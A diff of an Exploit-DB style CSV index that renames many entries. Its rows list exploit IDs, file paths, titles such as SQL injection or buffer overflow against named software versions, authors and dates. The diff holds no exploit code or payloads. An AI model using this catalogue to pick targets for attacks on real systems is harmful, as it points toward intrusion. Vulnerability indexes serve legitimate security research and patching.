 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0
@@ -31230,7 +31230,7 @@ id,file,description,date,author,platform,type,port
 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0
 34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80
 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
-34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
+34571,platforms/php/webapps/34571.py,"Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
 34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0
 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80
@@ -31276,7 +31276,7 @@ id,file,description,date,author,platform,type,port
 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0
 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80
-34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - (index.php contacts_id Parameter)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
+34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900
 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0
 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0
@@ -31399,8 +31399,8 @@ id,file,description,date,author,platform,type,port
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0
 34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow (PoC)",2014-09-24,"Pedro Sánchez",windows,dos,0
 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure",2014-09-24,ZoRLu,asp,webapps,80
-34754,platforms/php/webapps/34754.py,"Joomla! Component Face Gallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
-34755,platforms/php/webapps/34755.py,"Joomla! Component Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
+34754,platforms/php/webapps/34754.py,"Joomla! Component 'com_facegallery' 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
+34755,platforms/php/webapps/34755.py,"Joomla! Component 'com_macgallery' 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)",2014-09-24,Metasploit,windows,remote,3000
 34757,platforms/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit)",2014-09-24,Metasploit,windows,remote,0
 34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,php,webapps,80
@@ -31826,7 +31826,7 @@ id,file,description,date,author,platform,type,port
 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0
 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80
 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0
-35220,platforms/multiple/webapps/35220.txt,"Joomla! Component HD FLV Player < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0
+35220,platforms/multiple/webapps/35220.txt,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0
 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0
 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80
@@ -31851,7 +31851,7 @@ id,file,description,date,author,platform,type,port
 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0
 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service",2011-01-19,"Craig Freyman",windows,dos,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
-35246,platforms/php/webapps/35246.py,"Joomla! Component HD FLV Player < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
+35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
 35293,platforms/php/webapps/35293.txt,"Joomla! Component VirtueMart eCommerce 1.1.6 - SQL Injection",2011-01-31,"Andrea Fabrizi",php,webapps,0
 35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0
@@ -32305,7 +32305,7 @@ id,file,description,date,author,platform,type,port
 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0
 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0
-35752,platforms/php/webapps/35752.txt,"Mambo - 'com_docman' 1.3.0 Component Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
+35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0
 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service",2011-05-16,Knud,multiple,dos,0
 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0
 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0
@@ -32358,7 +32358,7 @@ id,file,description,date,author,platform,type,port
 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0
 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0
 35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0
-35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0
+35808,platforms/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0
 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0
 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
 35811,platforms/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - (User Profile Service) Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",windows,local,0
@@ -32438,7 +32438,7 @@ id,file,description,date,author,platform,type,port
 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0
 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0
 35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0
-35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
+35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow",2011-06-27,"Luigi Auriemma",windows,remote,0
 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
@@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port
 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0
 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0
 36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting",2011-11-17,"High-Tech Bridge SA",php,webapps,0
-35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
+35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)",2015-02-03,Metasploit,windows,local,0
 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0
@@ -32609,13 +32609,13 @@ id,file,description,date,author,platform,type,port
 36075,platforms/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0
 36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps,0
 36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
-36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - Buffer Overflow MKD Command",2015-02-14,R-73eN,windows,remote,0
+36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow",2015-02-14,R-73eN,windows,remote,0
 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0
 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0
 36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' Parameter SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0
 36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0
 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0
-36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0
+36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0
 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0
 36086,platforms/php/webapps/36086.txt,"Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps,0
 36087,platforms/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps,0
@@ -32625,21 +32625,21 @@ id,file,description,date,author,platform,type,port
 36092,platforms/windows/dos/36092.pl,"MapServer 6.0 - '.Map' File Double-Free Remote Denial of Service",2011-08-30,rouault,windows,dos,0
 36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps,0
 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0
-36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
+36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
 36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0
-36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
+36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0
 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
 36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow (Metasploit)",2015-02-17,Metasploit,windows,remote,0
 36101,platforms/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)",2015-02-17,Metasploit,java,remote,1617
-36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
-36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
+36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
+36103,platforms/php/webapps/36103.txt,"Mambo Component 'com_ahsshop' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
 36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH)",2015-02-18,"Andrew Smith",windows,local,0
 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0
-36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
+36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0
-36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
-36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
+36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
+36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0
 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0
 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0
 36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
@@ -32695,7 +32695,7 @@ id,file,description,date,author,platform,type,port
 36165,platforms/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps,0
 36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
-36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
+36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0
 36171,platforms/php/webapps/36171.txt,"Joomla! Component com_biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
@@ -32803,7 +32803,7 @@ id,file,description,date,author,platform,type,port
 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0
 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection",2011-11-02,"High-Tech Bridge SA",php,webapps,0
-36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0
+36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0
 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0
 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0
@@ -32894,7 +32894,7 @@ id,file,description,date,author,platform,type,port
 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0
 36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0
-36373,platforms/php/webapps/36373.txt,"Joomla! Component Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0
+36373,platforms/php/webapps/36373.txt,"Joomla! Component 'com_simplephotogallery' 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0
 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0
 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0
 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
@@ -32906,7 +32906,7 @@ id,file,description,date,author,platform,type,port
 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0
 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0
 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0
-36385,platforms/php/webapps/36385.txt,"Joomla! Component Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0
+36385,platforms/php/webapps/36385.txt,"Joomla! Component 'com_simplephotogallery' 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0
 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0
 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0
 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0
@@ -32960,7 +32960,7 @@ id,file,description,date,author,platform,type,port
 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0
 36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0
 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,php,remote,80
-36439,platforms/php/webapps/36439.txt,"Joomla! Plugin eCommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
+36439,platforms/php/webapps/36439.txt,"Joomla! Component 'com_ecommercewd' 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80
 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080
 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443
 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0
@@ -32985,7 +32985,7 @@ id,file,description,date,author,platform,type,port
 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0
 36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0
 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0
-36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0
+36464,platforms/php/webapps/36464.txt,"Joomla! Component 'com_spiderfaq' - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0
 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0
@@ -33070,8 +33070,8 @@ id,file,description,date,author,platform,type,port
 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0
 36747,platforms/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local,0
 36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0
-36560,platforms/php/webapps/36560.txt,"Joomla! Component Gallery WD - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0
-36561,platforms/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
+36560,platforms/php/webapps/36560.txt,"Joomla! Component 'com_gallery_wd' - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0
+36561,platforms/php/webapps/36561.txt,"Joomla! Component 'com_contactformmaker' 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0
 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
 36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Privilege Escalation (PoC)",2015-03-30,"Sebastian Krahmer",linux,local,0
 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -33110,7 +33110,7 @@ id,file,description,date,author,platform,type,port
 36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
-36601,platforms/php/webapps/36601.txt,"Joomla! Component Spider Random Article - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
+36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
 36620,platforms/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0
 36602,platforms/windows/remote/36602.html,"WebGate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
